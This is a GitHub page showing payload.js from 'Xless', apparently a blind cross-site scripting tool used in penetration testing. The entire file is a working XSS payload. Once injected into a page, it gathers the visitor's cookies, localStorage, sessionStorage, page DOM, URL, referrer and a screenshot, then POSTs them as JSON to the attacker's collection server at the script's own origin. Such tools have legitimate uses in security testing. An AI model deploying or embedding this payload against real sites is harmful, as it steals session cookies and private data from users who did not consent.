-
Notifications
You must be signed in to change notification settings - Fork 128
/
payload.js
72 lines (61 loc) · 2.78 KB
/
payload.js
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
// Xless: The serverlesss Blind XSS app.
// Author: Mazin Ahmed <[email protected]>
console.log("Loaded xless.");
var collected_data = {};
var curScript = document.currentScript;
function return_value(value) {
return (value !== undefined) ? value : ""
}
function screenshot() {
return new Promise(function (resolve, reject) {
html2canvas(document.querySelector("html"), { letterRendering: 1, allowTaint: true, useCORS: true, width: 1024, height: 768}).then(function (canvas) {
resolve(return_value(canvas.toDataURL())) // png in dataURL format
});
});
}
function collect_data() {
return new Promise(function (resolve, reject) {
collected_data["Cookies"] = collected_data["Location"] = collected_data["Referrer"] = collected_data["User-Agent"] = collected_data["Browser Time"] = collected_data["Origin"] = collected_data["DOM"] = collected_data["localStorage"] = collected_data["sessionStorage"] = collected_data["Screenshot"] = "";
try { collected_data["Location"] = return_value(location.toString()) } catch(e) {}
try { collected_data["Cookies"] = return_value(document.cookie) } catch(e) {}
try { collected_data["Referrer"] = return_value(document.referrer) } catch(e) {}
try { collected_data["User-Agent"] = return_value(navigator.userAgent); } catch(e) {}
try { collected_data["Browser Time"] = return_value(new Date().toTimeString()); } catch(e) {}
try { collected_data["Origin"] = return_value(location.origin); } catch(e) {}
try { collected_data["DOM"] = return_value(document.documentElement.outerHTML); } catch(e) {}
collected_data["DOM"] = collected_data["DOM"].slice(0, 8192)
try { collected_data["localStorage"] = return_value(localStorage.toSource()); } catch(e) {}
try { collected_data["sessionStorage"] = return_value(sessionStorage.toSource()); } catch(e) {}
try {
screenshot().then(function(img) {
collected_data["Screenshot"] = img
resolve(collected_data)
});
} catch(e) {
resolve(collected_data)
}
});
}
function exfiltrate_loot() {
// Get the URI of our BXSS server
var uri = new URL(curScript.src);
var exf_url = uri.origin + "/c"
var xhr = new XMLHttpRequest()
xhr.open("POST", exf_url, true)
xhr.setRequestHeader("Content-Type", "application/json")
xhr.send(JSON.stringify(collected_data))
}
// Load the html2canvas dependency
(function(d, script) {
script = d.createElement('script');
script.type = 'text/javascript';
script.async = true;
script.onload = function(){
// remote script has loaded
collect_data().then(function() {
exfiltrate_loot();
});
};
script.src = "https://cdn.jsdelivr.net/npm/[email protected]/dist/html2canvas.min.js";
d.getElementsByTagName('head')[0].appendChild(script);
}(document));